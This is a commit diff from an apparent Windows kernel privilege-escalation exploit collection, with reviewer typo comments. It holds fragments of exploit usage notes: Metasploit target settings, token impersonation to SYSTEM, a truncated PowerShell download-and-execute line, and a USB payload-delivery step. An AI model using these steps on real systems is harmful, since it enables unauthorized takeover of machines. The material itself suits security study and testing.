mirror of
https://mirror.skon.top/github.com/Ascotbe/Kernelhub
synced 2026-04-22 05:40:26 +08:00
Update image source🍈
@@ -34,9 +34,9 @@ set RHOST 192.168.1.17
run
```




查看系统信息






@@ -34,9 +34,9 @@ set RHOST 192.168.1.17
run
```




View system information






@@ -22,7 +22,7 @@

测试系统Windows Server 2003 SP2 x86




#### 分析文章
- https://github.com/lyshark/Windows-exploits/blob/master/Windows%20%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%20ms08025%20%E5%88%86%E6%9E%90.7z


@@ -22,7 +22,7 @@ Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, S

Test system Windows Server 2003 SP2 x86




#### Analyze
- https://github.com/lyshark/Windows-exploits/blob/master/Windows%20%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%20ms08025%20%E5%88%86%E6%9E%90.7z


@@ -20,7 +20,7 @@

只找到可执行exe文件,测试系统Windows Server 2003 SP2 x86




#### 分析文章
- https://bbs.pediy.com/thread-74811.htm

@@ -21,7 +21,7 @@ afd.sys in the Ancillary Function Driver (AFD) component in Microsoft Windows XP

Only find Exe files, test systems Windows Server 2003 SP2 x86




#### Analyze
- https://bbs.pediy.com/thread-74811.htm

@@ -27,5 +27,5 @@ set SMBHOST 192.168.1.14 #目标IP
run
```






@@ -28,5 +28,5 @@ set SMBHOST 192.168.1.14 #目标IP
run
```






@@ -29,7 +29,7 @@ set RHOST 192.168.1.14
run
```




#### 分析文章
- https://bbs.pediy.com/thread-251219.htm


@@ -30,7 +30,7 @@ set RHOST 192.168.1.14
run
```




#### Analyze
- https://bbs.pediy.com/thread-251219.htm


@@ -24,7 +24,7 @@ set RHOSTS 192.168.1.13 #目标IP
run
```




#### 分析文章
- https://www.giantbranch.cn/2017/08/26/Educatedscholar%E5%88%A9%E7%94%A8%E7%9A%84%E6%BC%8F%E6%B4%9Ems09-050%E5%88%86%E6%9E%90%E5%8F%8A%E5%85%B6%E5%88%A9%E7%94%A8%E7%9A%84shellcode%E5%88%86%E6%9E%90%E5%8F%8A%E4%B8%8Emsf%E5%88%A9%E7%94%A8%E5%AF%B9%E6%AF%94/


@@ -25,7 +25,7 @@ set RHOSTS 192.168.1.13 #目标IP
run
```




#### Analyze
- https://www.giantbranch.cn/2017/08/26/Educatedscholar%E5%88%A9%E7%94%A8%E7%9A%84%E6%BC%8F%E6%B4%9Ems09-050%E5%88%86%E6%9E%90%E5%8F%8A%E5%85%B6%E5%88%A9%E7%94%A8%E7%9A%84shellcode%E5%88%86%E6%9E%90%E5%8F%8A%E4%B8%8Emsf%E5%88%A9%E7%94%A8%E5%AF%B9%E6%AF%94/


@@ -26,7 +26,7 @@

测试系统Windows Server 2003 SP2 x86




> msf利用


@@ -40,8 +40,8 @@ run

可以看到当前权限是最低的




然后执行命令提权




@@ -27,7 +27,7 @@ CompilerEnvironment

Test system Windows Server 2003 SP2 x86




> MSF utilization


@@ -41,8 +41,8 @@ run

You can see that the current permissions are the lowest.




Then execute command rights




@@ -22,5 +22,5 @@ win32k.sys中的Windows内核模式驱动程序无法正确验证伪句柄值

测试系统Windows Server 2003 SP2 x86






@@ -23,5 +23,5 @@ The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP

Test system Windows Server 2003 SP2 x86






@@ -25,9 +25,9 @@ set SESSION 2
run
```




然后就能提权成功了






@@ -25,9 +25,9 @@ set SESSION 2
run
```




Then it will be successful.






@@ -29,7 +29,7 @@ i686-w64-mingw32-gcc CVE-2011-1249.c -o CVE-2011-1249.exe -lws2_32

测试系统Windows Server 2003 SP2 x86和Windows 7 SP1 x86都成功




#### 分析文章
- https://github.com/Madusanka99/OHTS/blob/master/IT16075504%20-OHTS%20Report.pdf

@@ -29,7 +29,7 @@ i686-w64-mingw32-gcc CVE-2011-1249.c -o CVE-2011-1249.exe -lws2_32

Test system Windows Server 2003 SP2 x86 and Windows 7 SP1 x86 Can use




#### Analyze
- https://github.com/Madusanka99/OHTS/blob/master/IT16075504%20-OHTS%20Report.pdf

@@ -22,9 +22,9 @@ i686-w64-mingw32-gcc CVE-2011-1974.c -o CVE-2011-1974.exe -lws2_32

测试系统Windows Server 2003 SP2 x86,首先需要用管理员修改注册表和开启服务




接着切回普通用户






@@ -23,9 +23,9 @@ i686-w64-mingw32-gcc CVE-2011-1974.c -o CVE-2011-1974.exe -lws2_32

Test system Windows Server 2003 SP2 x86,First, you need to modify the registry and open service with an administrator.




Then cut back to ordinary users






@@ -16,7 +16,7 @@

测试系统Windows Server 2003 SP2 x86




msf利用直接使用这个即可



@@ -16,7 +16,7 @@ afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and

Test system Windows Server 2003 SP2 x86




MSF uses it directly to use this



@@ -23,5 +23,5 @@

测试系统Windows Server 2008 R2 SP1 x64






@@ -24,5 +24,5 @@ CompilerEnvironment

Test system Windows Server 2008 R2 SP1 x64






@@ -27,7 +27,7 @@

测试系统Windows Server 2003 SP2 x86




#### 分析文章
- https://www.anquanke.com/vul/id/1045064


@@ -27,7 +27,7 @@ CompilerEnvironment

Test system Windows Server 2003 SP2 x86




#### Analyze
- https://www.anquanke.com/vul/id/1045064


@@ -31,15 +31,15 @@ set SESSION 2 #你上线机器的session
run
```




Windows Sever 2003 SP2 x86 和Windows Sever 2003 R2 SP2 x86都测试成功,但是利用文件没有源码只有exe可执行文件

Windows Sever 2003 SP2 x86 动图如下




Windows Sever 2003 R2 SP2 x86 动图如下






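Review bot: `Sever` should be `Server` in the three context lines `Windows Sever 2003 SP2 x86 和Windows Sever 2003 R2 SP2 x86都测试成功...`, `Windows Sever 2003 SP2 x86 动图如下` and `Windows Sever 2003 R2 SP2 x86 动图如下`; the English README's `Windows Sever 2003 SP2 x86 GIF` and `Windows Sever 2003 R2 SP2 x86 GIF` lines in the next hunk carry the same typo, so fix both files together.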
@@ -31,15 +31,15 @@ set SESSION 2 #你上线机器的session
run
```




Windows Server 2003 SP2 X86 and Windows Server 2003 R2 SP2 X86 are successful, but the file does not have the source code only exe executable

Windows Sever 2003 SP2 x86 GIF




Windows Sever 2003 R2 SP2 x86 GIF






@@ -27,13 +27,13 @@

测试系统Windows 7 SP1 x86 ,测试exe文件和py脚本都可以正常利用




> x64利用

测试系统Windows 7 SP1 x64 测试利用py脚本,exe文件有机率蓝屏




#### 分析文章
- https://xz.aliyun.com/t/6770


@@ -28,13 +28,13 @@ With the script is Python, there is also a compiled EXE version

Test system Windows 7 SP1 x86 ,Test EXE files and py scripts can be used normally




> x64 utilization

Test system Windows 7 SP1 x64 Use the PY script, EXE file organically blue screen




#### Analyze
- https://xz.aliyun.com/t/6770


@@ -20,7 +20,7 @@ i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe

测试机器Windows Server 2003 SP2 x86





#### 分析文章


@@ -21,7 +21,7 @@ i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe

Test Machine Windows Server 2003 SP2 x86





#### Analyze


@@ -32,13 +32,13 @@

测试系统Windows 7 SP1 x86




> x64利用

测试系统Windows 7 SP1 x64




#### 分析文章
- https://xz.aliyun.com/t/4456


@@ -33,13 +33,13 @@ CompilerEnvironment

Test system Windows 7 SP1 x86




> x64 utilization

Test system Windows 7 SP1 x64




#### Analyze
- https://xz.aliyun.com/t/4456


@@ -30,7 +30,7 @@

利用Windows 7 SP1 x86作为演示




> x64利用


@@ -40,7 +40,7 @@

利用Windows Server 2008 R2 SP1 x64进行测试




#### 分析文章
- https://www.shuzhiduo.com/A/Vx5M1WrL5N/


@@ -30,7 +30,7 @@ CompilerEnvironment

Use Windows 7 SP1 X86 as a demonstration




> X64 utilization


@@ -40,7 +40,7 @@ CompilerEnvironment

Testing with Windows Server 2008 R2 SP1 X64




#### Analyze
- https://www.shuzhiduo.com/A/Vx5M1WrL5N/


@@ -31,7 +31,7 @@

对Windows 7 SP1 x86进行测试




#### 分析文章
- https://xz.aliyun.com/t/4549


@@ -32,7 +32,7 @@ The test uses the compiled EXP `CVE-2015-0057_x86` and `CVE-2015-0057_x64` found

Test Windows 7 SP1 X86




#### Analyze
- https://xz.aliyun.com/t/4549


@@ -24,10 +24,10 @@

测试机器 Windows 7 SP1 x86




> x64利用

测试使用Windows Server 2008 R2 SP1 x64




@@ -24,10 +24,10 @@ CompilerEnvironment

Test Machine Windows 7 SP1 x86




> x64 utilization

Test Machine Windows Server 2008 R2 SP1 x64




@@ -36,7 +36,7 @@ Trebuchet.exe c:\Users\ascotbe\Desktop\test.txt c:\Windows\System32\test1.txt

演示机器Windows 7 SP1 x86




#### 分析文章
- http://bobao.360.cn/learning/detail/584.html


@@ -36,7 +36,7 @@ Trebuchet.exe c:\Users\ascotbe\Desktop\test.txt c:\Windows\System32\test1.txt

Demonstrate Machine Windows 7 SP1 x86




#### Analyze
- http://bobao.360.cn/learning/detail/584.html


@@ -31,5 +31,5 @@ Adobe Type Manager字体驱动程序中的ATMFD.DLL允许本地用户通过精

演示系统Windows Server 2003 SP2 x86






@@ -32,5 +32,5 @@ Currently compiled only the `CVE-2015-2387_X86` project,`CVE-2015-2387_X64` pr

Demo System Windows Server 2003 SP2 x86






@@ -28,7 +28,7 @@

测试机器Windows 7 SP1 x86,当前只有x86版本的EXP,测试GIF图




#### 分析文章
- http://drops.xmd5.com/static/drops/papers-9276.html


@@ -29,7 +29,7 @@ CompilerEnvironment

Test Machine Windows 7 SP1 X86, current only X86 version of Exp, test GIF map




#### Analyze
- http://drops.xmd5.com/static/drops/papers-9276.html


@@ -35,7 +35,7 @@ run

可以看到如下的反弹shell




接着使用提权漏洞


@@ -45,6 +45,6 @@ set session 2#你当前的session
run
```




可以看到我们最后成为了SYSTEM权限

@@ -36,7 +36,7 @@ run

You can see the following rebound shell




Then use the rights vulnerability


@@ -46,6 +46,6 @@ set session 2#你当前的session
run
```




You can see that we finally became SYSTEM permissions.

@@ -27,5 +27,5 @@

测试机器Windows 7 SP1 x86。需要把**CVE-2016-0051_x86.zip**解压后的两个文件放到目标中






@@ -27,5 +27,5 @@ CompilerEnvironment

Test Machine Windows 7 SP1 x86. Need to decompress the two files after the **CVE-2016-0051_X86.zip** is placed in the target






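Review bot: the context line `Need to decompress the two files after the **CVE-2016-0051_X86.zip** is placed in the target` inverts the order given in the Chinese README (`需要把**CVE-2016-0051_x86.zip**解压后的两个文件放到目标中`: extract the zip first, then place the two extracted files on the target). Suggest `Extract **CVE-2016-0051_x86.zip** and place the two extracted files on the target machine.`, which also restores the `_x86` casing used for the file name in the Chinese version.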
@@ -25,7 +25,7 @@

测试Windows 7 SP1 x64的GIF图




#### 分析文章
- https://xz.aliyun.com/t/6008


@@ -25,7 +25,7 @@ The X64 version in the project is perfect for Windows 7 SP1 X64 and Windows Serv

Test the GIF map of Windows 7 SP1 X64




#### Analyze
- https://xz.aliyun.com/t/6008


@@ -38,9 +38,9 @@ powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('

GIF图如下




利用exe文件测试通杀x64和x86的所有版本,这边只录制Windows 7 SP1 x64版本的






@@ -38,9 +38,9 @@ powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('

GIF map is as follows




Test all the versions of X64 and X86 using the EXE file, which only records Windows 7 SP1 X64 version






@@ -31,7 +31,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3225

Windows 7 SP1 x64测试中,使用`whoami /priv`命令查看发现并无**SeImpersonatePrivilege**特权烂土豆提权需要该特权为开启状态,所以测试的时候直接用管理员权限运行




利用MSF+烂土豆提权,首先我们假定机器已经上线,通过msf中自带的插件来识别当前系统中可以利用的EXP来进行提权


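Review bot: the context line `...并无**SeImpersonatePrivilege**特权烂土豆提权需要该特权为开启状态...` runs two statements together; put a comma after `特权` so it reads `...并无**SeImpersonatePrivilege**特权,烂土豆提权需要该特权为开启状态,所以测试的时候直接用管理员权限运行`.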
@@ -43,11 +43,11 @@ run

如果没有用管理员权限运行MSF生成的exe的话,脚本检测是这样的




如果使用管理员权限运行的话检测是这样的,可以看到比上面多了个ms16_075




编译好烂土豆的文件


@@ -71,11 +71,11 @@ list_tokens -u #列出目标主机用户的可用令牌
impersonate_token "NT AUTHORITY\SYSTEM"#假冒目标主机上的可用令牌
```




进入shell查看




> 第二种利用方式


@@ -85,5 +85,5 @@ impersonate_token "NT AUTHORITY\SYSTEM"#假冒目标主机上的可用令牌

由于普通账号没有**SeImpersonatePrivilege**特权,这边用管理员账号来演示,利用程序**potatoNG.exe**直接上GIF图






@@ -32,7 +32,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3225

Windows 7 SP1 x64测试中,use `whoami /priv` Command View Discovery None **SeiMpersonateprivilege** Privilege Potato Right requires this privilege to turn on, so use administrator privileges when testing




Use MSF + rotten potatoes,First we assume that the machine has been launched, through the plugins from the MSF to identify the EXP you can take advantage of the current system to carry out rights


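Review bot: the privilege name is miscased in the context line as `SeiMpersonateprivilege`; the Chinese README and the `whoami /priv` output it refers to use `SeImpersonatePrivilege`, so correct the casing (the later hunk of this file, `Since there is no **Seimpersonateprivilege** privilege`, has the same problem). The fragment `Command View Discovery None ... Privilege Potato Right requires this privilege to turn on` also needs rewording, e.g. `In the Windows 7 SP1 x64 test, whoami /priv showed no SeImpersonatePrivilege; the Rotten Potato escalation needs that privilege enabled, so the test was run with administrator rights`.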
@@ -44,11 +44,11 @@ run

If you do not run the MSF generated EXE, the script test is like this.




If you use the administrator privilege to run, you can see more than the above MS16_075.




Compiling the files of bad potatoes


@@ -72,11 +72,11 @@ list_tokens -u #列出目标主机用户的可用令牌
impersonate_token "NT AUTHORITY\SYSTEM"#假冒目标主机上的可用令牌
```




Enter the Shell View




> Second utilization


@@ -86,5 +86,5 @@ CompilerEnvironment

Since there is no **Seimpersonateprivilege** privilege, this is demonstrated by the administrator account, using the program **potatoNG.exe** directly GIF map






@@ -30,7 +30,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3371

测试系统Windows 8.1 x64




#### 项目来源



@@ -31,7 +31,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3371

Test system Windows 8.1 x64




#### ProjectSource



@@ -37,7 +37,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7255

通过ps脚本进行演示,直接上GIF图




#### 分析文章
- https://www.anquanke.com/post/id/85232

@@ -37,7 +37,7 @@ This vulnerability kills all affected system X64 versions, three Exp can be used

Demo through the PS script, directly on the GIF map




#### Analyze
- https://www.anquanke.com/post/id/85232

@@ -26,7 +26,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0101

测试Windows 7 SP1 x86通过,直接上GIF图




#### 分析文章
- https://paper.seebug.org/586/


@@ -27,7 +27,7 @@ CompilerEnvironment

Test Windows 7 SP1 X86 pass, directly on GIF map




#### Analyze
- https://paper.seebug.org/586/


@@ -37,11 +37,11 @@ set RHOSTS 192.168.0.128
run
```




并且权限是system的





#### 分析文章


@@ -38,11 +38,11 @@ set RHOSTS 192.168.0.128
run
```




And the permissions are SYSTEM





#### Analyze


@@ -36,7 +36,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0213

测试环境Windows 7 SP1 x64




#### 分析文章
- https://cloud.tencent.com/developer/article/1045805

@@ -36,7 +36,7 @@ CompilerEnvironment

Test environment Windows 7 SP1 x64




#### Analyze
- https://cloud.tencent.com/developer/article/1045805

@@ -41,7 +41,7 @@ run

生成文件




运行命令把它拷贝到test目录下


@@ -49,7 +49,7 @@ run
cp -r /root/.msf4/local/ /root/test
```




接着把这些文件全部拷贝到U盘中,然后插上电脑即可


@@ -61,7 +61,7 @@ https://github.com/Ascotbe/WinKernelhub/tree/master/Patch

GIF图如下




#### 分析文章
- https://my.oschina.net/u/4310658/blog/3695267


@@ -42,7 +42,7 @@ run

Generate files




Run the command to copy it into the test directory


@@ -50,7 +50,7 @@ Run the command to copy it into the test directory
cp -r /root/.msf4/local/ /root/test
```




Then copy all of these files to the U disk, then plug in the computer.


@@ -62,7 +62,7 @@ https://github.com/Ascotbe/WinKernelhub/tree/master/Patch

GIF map is as follows




#### Analyze
- https://my.oschina.net/u/4310658/blog/3695267


@@ -26,7 +26,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0833

效果图如下




#### 分析文章
- https://de4dcr0w.github.io/cve%E6%BC%8F%E6%B4%9E/SMBv3%E6%97%A0%E6%95%88%E6%8C%87%E9%92%88%E5%BC%95%E7%94%A8%E6%BC%8F%E6%B4%9E(CVE-2018-0833).html


@@ -27,7 +27,7 @@ First, use a machine (test Used Kali) to run the Python script in the project, t

The effect picture is as follows




#### Analyze
- https://de4dcr0w.github.io/cve%E6%BC%8F%E6%B4%9E/SMBv3%E6%97%A0%E6%95%88%E6%8C%87%E9%92%88%E5%BC%95%E7%94%A8%E6%BC%8F%E6%B4%9E(CVE-2018-0833).html


@@ -27,7 +27,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120

当前测试系统Windows 7 SP1 x64




#### 分析文章
- https://github.com/EVOL4/CVE-2018-8120/blob/master/CVE-2018-8120.md


@@ -27,7 +27,7 @@ CompilerEnvironment

Test system Windows 7 SP1 x64




#### Analyze
- https://github.com/EVOL4/CVE-2018-8120/blob/master/CVE-2018-8120.md


@@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453

测试系统Windows 10 1709 x64




#### 分析文章
- https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453


@@ -40,7 +40,7 @@ CompilerEnvironment

Test system Windows 10 1709 x64




#### Analyze
- https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453


@@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8639

在Windows 2008 R2 SP1 X64上测试通过的EXP,直接上GIF图







@@ -54,7 +54,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8639

Windows 7 SP1 X64测试通过的EXP,上GIF图




#### 分析文章
- https://www.anquanke.com/post/id/183358


@@ -40,7 +40,7 @@ CompilerEnvironment

Windows 2008 R2 SP1 X64 test passed EXP, directly on GIF map







@@ -54,7 +54,7 @@ CompilerEnvironment

Windows 7 SP1 X64 test via EXP, on GIF map




#### Analyze
- https://www.anquanke.com/post/id/183358


@@ -38,7 +38,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0623

改POC只对x86的机器有效,测试机器为Windows 7 SP1 x86








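Review bot: typo in the context line `改POC只对x86的机器有效`: `改` (modify) should be `该` (this), i.e. `该POC只对x86的机器有效,测试机器为Windows 7 SP1 x86`.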
@@ -39,7 +39,7 @@ CompilerEnvironment

POC is only valid for the X86 machine, the test machine is Windows 7 SP1 X86








@@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803

这里测试机器是Windows Server 2008 R2 x64,上GIF图




#### 分析文章
- https://bbs.pediy.com/thread-260289.htm


@@ -40,7 +40,7 @@ CompilerEnvironment

Here the test machine is Windows Server 2008 R2 X64, on the GIF map




#### Analyze
- https://bbs.pediy.com/thread-260289.htm


@@ -25,7 +25,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808
- 编译有点问题

测试机器为Windows 7 SP1 x86







@@ -26,7 +26,7 @@ CompilerEnvironment

Test machine for Windows 7 SP1 X86








@@ -42,7 +42,7 @@ https://github.com/Ascotbe/WindowsKernelExploits/blob/master/CVE-2019-1388/HHUPD

测试系统Windows 7 SP1 x64




#### 分析文章
- http://blog.leanote.com/post/snowming/38069f423c76


@@ -42,7 +42,7 @@ https://github.com/Ascotbe/WindowsKernelExploits/blob/master/CVE-2019-1388/HHUPD

Test system Windows 7 SP1 x64




#### Analyze
- http://blog.leanote.com/post/snowming/38069f423c76


@@ -39,7 +39,7 @@ cve-2019-1458.exe

测试系统Windows 7 SP1 x64 ,直接上GIF图




#### 分析文章
- https://github.com/piotrflorczyk/cve-2019-1458_POC


@@ -40,7 +40,7 @@ cve-2019-1458.exe

Test system Windows 7 SP1 x64 ,Direct GIF map




#### Analyze
- https://github.com/piotrflorczyk/cve-2019-1458_POC


@@ -42,7 +42,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0668

该EXP是使用提权进行文件迁移操作,如果想使用cmd需要自己修改代码,测试机器Windows 10 1709 X64,动图中是把**test.dll**移动到 `C:\Windows\System32`目录下,**test.dll**可以是任意文件。使用exe时需要把**NtApiDotNet.dll**文件放到同级目录




> Use https://github.com/itm4n/UsoDllLoader (Windows >= 1903) OR https://github.com/xct/diaghub (Windows < 1903) for privilege escalation.



@@ -42,7 +42,7 @@ CompilerEnvironment

The exp is a file migration operation using rights, if you want to use CMD, you need to modify the code, test the machine Windows 10 1709 x64,The moving map is moved to the `C:\Windows\System32` directory, **Test.dll** can be any file. Put the **ntapidotNet.dll** file in the same level when using EXE




> Use https://github.com/itm4n/UsoDllLoader (Windows >= 1903) OR https://github.com/xct/diaghub (Windows < 1903) for privilege escalation.



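Review bot: the context line drops the subject of the move and miscases two file names. The Chinese README says the GIF shows **test.dll** being moved into `C:\Windows\System32` and that **NtApiDotNet.dll** must sit next to the exe, but this line reads `The moving map is moved to the ... directory` and spells the assembly **ntapidotNet.dll**. Suggest rewording to: In the GIF, **test.dll** is moved to `C:\Windows\System32`; **test.dll** can be any file. When using the exe, put **NtApiDotNet.dll** in the same directory.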
@@ -42,7 +42,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0683

测试机器Windows 10 1909 X64,源码中只对指定文件进行写入信息,如果需要获取某项程序的权限,需要自行修改源码




#### 分析文章
- [MSI_EoP_New.pdf](./MSI_EoP_New.pdf)


@@ -42,7 +42,7 @@ CompilerEnvironment

Test Machine Windows 10 1909 x64, only written information on the specified file in the source code, if you need to get the permissions of a program, you need to modify the source code yourself.




#### Analyze



@@ -48,7 +48,7 @@ BitsArbitraryFileMoveExploit.exe

测试系统Windows 7 SP1 x64,直接上GIF图




#### 分析文章
- https://f5.pm/go-28382.html


@@ -48,7 +48,7 @@ BitsArbitraryFileMoveExploit.exe

Test system Windows 7 SP1 x64,Direct GIF map




#### Analyze
- https://f5.pm/go-28382.html


@@ -39,11 +39,11 @@ ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4
Get-FileHash -Path c:/windows/system32/drivers/srv2.sys
```




然后就直接上GIF图了




#### 分析文章
- https://paper.seebug.org/1168/


@@ -40,11 +40,11 @@ View MD5 value
Get-FileHash -Path c:/windows/system32/drivers/srv2.sys
```




Then directly gif map




#### Analyze
- https://paper.seebug.org/1168/


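Review bot: the hunk header context `View MD5 value` does not match the command in the hunk, `Get-FileHash -Path c:/windows/system32/drivers/srv2.sys`, which computes a SHA256 hash by default; either add `-Algorithm MD5` to the command or retitle the section (for example `View the SHA256 value`) so readers compare the driver against the right kind of hash.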
@@ -49,7 +49,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1015

测试机器Windows 10 1909 X64,会使CPU跑满导致蓝屏




#### 分析文章
- https://0xeb-bp.com/blog/2020/05/12/cve-2020-1015-analysis.html


@@ -49,7 +49,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1015

Test Machine Windows 10 1909 x64, will make CPUs to lead blue screen




#### Analyze
- https://0xeb-bp.com/blog/2020/05/12/cve-2020-1015-analysis.html


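Review bot: the context line `will make CPUs to lead blue screen` is unclear; the Chinese README says `会使CPU跑满导致蓝屏`, i.e. the PoC pegs the CPU at full load and then triggers a blue screen. Suggest `Test machine Windows 10 1909 x64; the PoC drives the CPU to 100% and causes a blue screen`.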
@@ -53,7 +53,7 @@ cargo build --release

接着直接在Windows 7 SP1 X64下运行即可




#### 分析文章
- https://www.anquanke.com/post/id/209329


@@ -53,7 +53,7 @@ There are two points here to pay attention:

Then run directly in Windows 7 SP1 X64




#### Analyze
- https://www.anquanke.com/post/id/209329


Some files were not shown because too many files have changed in this diff